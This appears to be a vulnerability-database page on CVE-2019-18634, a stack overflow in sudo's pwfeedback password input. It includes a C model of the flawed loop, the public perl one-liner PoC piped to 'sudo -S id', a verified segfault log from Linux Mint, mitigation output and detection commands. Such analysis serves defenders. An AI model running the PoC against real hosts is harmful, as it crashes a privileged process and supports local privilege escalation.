CVE-2019-18634
Description
In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.
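To make the description's mechanism concrete, below is an added model (written for this page, not sudo's own source) of the getln() read loop in plugins/sudoers/tgetpass.c as it was shaped before sudo 1.8.26. The loop tracks its remaining space in `left` and its write position in `cp`. When pwfeedback is on and the line-kill character arrives, sudo echoes "\b \b" to the same fd it reads the password from; with `sudo -S` that fd is a pipe, so the write fails, the erase loop breaks before moving `cp` back, and `left` is nevertheless reset to the full buffer size. Because stdin is not a tty, the kill character was never initialised and was 0, which is why the PoC's NUL bytes refill `left` every 100 bytes. The byte source and sink are in-memory stand-ins, PASS_MAX = 256 is an assumed buffer size, the logical buffer sits inside a large backing array so the overflow is measured instead of crashing, and the `fixed` flag models the correction shipped in sudo 1.8.31 (reset `cp` together with `left`; the description's "before 1.8.26" reflects a 1.8.26 EOF-handling change that made the bug unexploitable).

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Added illustration of the pre-1.8.26 getln() loop; not sudo's code. */
#define PASS_MAX 256            /* assumed logical password buffer size */
#define BACKING  (64 * 1024)    /* slack so an overflow is measured, not fatal */

struct source { const unsigned char *data; size_t len, pos; };

/* read(fd, &c, 1) stand-in: 1 per byte, 0 at EOF. */
static ssize_t src_read(struct source *s, char *c)
{
    if (s->pos >= s->len)
        return 0;
    *c = (char)s->data[s->pos++];
    return 1;
}

/* write(fd, ...) stand-in. With `sudo -S` the fd is the read end of a
 * pipe, so the feedback write fails; write_fails models that case. */
static ssize_t sink_write(int write_fails, const char *p, size_t n)
{
    (void)p;
    return write_fails ? -1 : (ssize_t)n;
}

/* Returns max(cp - buf) seen; anything above bufsiz - 1 overflowed.
 * term_kill/term_erase are the tty line-kill and erase characters; when
 * stdin was not a tty sudo left both at 0, so a NUL byte hit the kill path. */
static size_t getln_model(struct source *src, char *buf, size_t bufsiz,
                          int feedback, int write_fails, int fixed,
                          char term_kill, char term_erase)
{
    size_t left = bufsiz, hwm = 0;
    char *cp = buf, c = '\0';

    while (--left) {
        if (src_read(src, &c) != 1 || c == '\n' || c == '\r')
            break;
        if (feedback) {
            if (c == term_kill) {
                while (cp > buf) {
                    if (sink_write(write_fails, "\b \b", 3) == -1)
                        break;          /* write fails: cp is left where it was */
                    cp--;
                }
                if (fixed)
                    cp = buf;           /* the fix: cp reset regardless of write() */
                left = bufsiz;          /* always reset: with a stale cp this is the bug */
                continue;
            } else if (c == term_erase) {
                if (cp > buf) {
                    ssize_t w = sink_write(write_fails, "\b \b", 3);
                    if (w == -1 && !fixed)
                        break;          /* pre-fix: a failed write ended input */
                    cp--;
                    left++;
                }
                continue;
            }
            (void)sink_write(write_fails, "*", 1);
        }
        *cp++ = c;
        if ((size_t)(cp - buf) > hwm)
            hwm = (size_t)(cp - buf);
    }
    *cp = '\0';
    return hwm;
}

/* Constructed input: the public PoC pattern ("A" x 100 . "\0") x 50.
 * Returns how many bytes the model stored into the PASS_MAX buffer. */
static size_t run_poc(int fixed, int write_fails)
{
    static unsigned char poc[50 * 101];
    static char backing[BACKING];
    struct source s = { poc, sizeof poc, 0 };

    for (size_t i = 0; i < 50; i++) {
        memset(poc + i * 101, 'A', 100);
        poc[i * 101 + 100] = '\0';
    }
    memset(backing, 0, sizeof backing);
    /* pwfeedback on; kill/erase uninitialised (0), as when stdin is not a tty */
    return getln_model(&s, backing, PASS_MAX, 1, write_fails, fixed, '\0', '\0');
}

int main(void)
{
    printf("vulnerable, pipe stdin: %zu bytes into a %d-byte buffer\n",
           run_poc(0, 1), PASS_MAX);
    printf("vulnerable, tty stdin : %zu bytes\n", run_poc(0, 0));
    printf("fixed, pipe stdin     : %zu bytes\n", run_poc(1, 1));
    return 0;
}
```

With the pipe case the vulnerable loop stores all 5000 'A's into a 256-byte buffer, while both the tty case and the fixed loop never hold more than the 100 bytes of one segment, which is why the crash needs both pwfeedback and a non-tty stdin. To check whether a host is exposed: `sudo -V` gives the version, and `grep -rE '^\s*Defaults.*pwfeedback' /etc/sudoers /etc/sudoers.d` (or the "Matching Defaults entries" section of `sudo -l`) shows whether the option is set.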
Ratings
- Attacker Value: Low
- Exploitability: Very High
Technical Analysis
This exploit is similar to CVE-2019-14287, in that it requires a specific config within /etc/sudoers. Present in sudo versions < 1.8.26, this vuln surrounds the pwfeedback option: an option that allows sudo to display asterisks when typing a sudo password. This module is susceptible to a buffer overflow attack, which was demonstrated in the following PoC:

```
$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
Password: Segmentation fault
```
Source – https://www.exploit-db.com/exploits/47995
An exploit for this vuln can be found here – https://github.com/saleemrashid/sudo-cve-2019-18634
A preconfigured test environment can be found here – https://tryhackme.com/room/sudovulnsbof
Technical Analysis
This isn’t a default in most installations I’ve seen. Looks like Linux Mint uses it, though, and that’s a decently sized target, IMHO. Popular for new users to Linux, which kind of explains why they’d turn on this particular setting. That said, I don’t think the corporate impact is high – unless they’re using Mint for workstations.
Great find, Joe. :–)
Technical Analysis
Verified against Linux Mint 19.3 Tricia live CD:
```
mint@mint:~$ uname -a
Linux mint 5.0.0-32-generic #34~18.04.2-Ubuntu SMP Thu Oct 10 10:36:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
mint@mint:~$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
[sudo] password for mint: Segmentation fault
mint@mint:~$ dmesg | tail -2
[  126.375340] sudo[1896]: segfault at 55ff66d8c000 ip 000055ff66b7e3b8 sp 00007fff565b26a0 error 6 in sudo[55ff66b66000+22000]
[  126.375345] Code: 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 40 00 48 8d 35 ac 6b 00 00 ba 01 00 00 00 89 df e8 8d c2 fe ff 0f b6 54 24 17 <41> 88 17 49 83 c7 01 4c 89 74 24 08 49 83 ee 01 4d 85 f6 0f 85 d7
mint@mint:~$
```
Mint’s mitigations:
```
mint@mint:~/Downloads$ ./checksec --file=/usr/bin/sudo
RELRO        STACK CANARY   NX           PIE          RPATH      RUNPATH     Symbols     FORTIFY  Fortified  Fortifiable  FILE
Full RELRO   Canary found   NX enabled   PIE enabled  No RPATH   RW-RUNPATH  No Symbols  Yes      6          12           /usr/bin/sudo
mint@mint:~/Downloads$
```
General Information
Vendors
- debian
- sudo project
Products
- debian linux 10.0
- debian linux 8.0
- debian linux 9.0
- sudo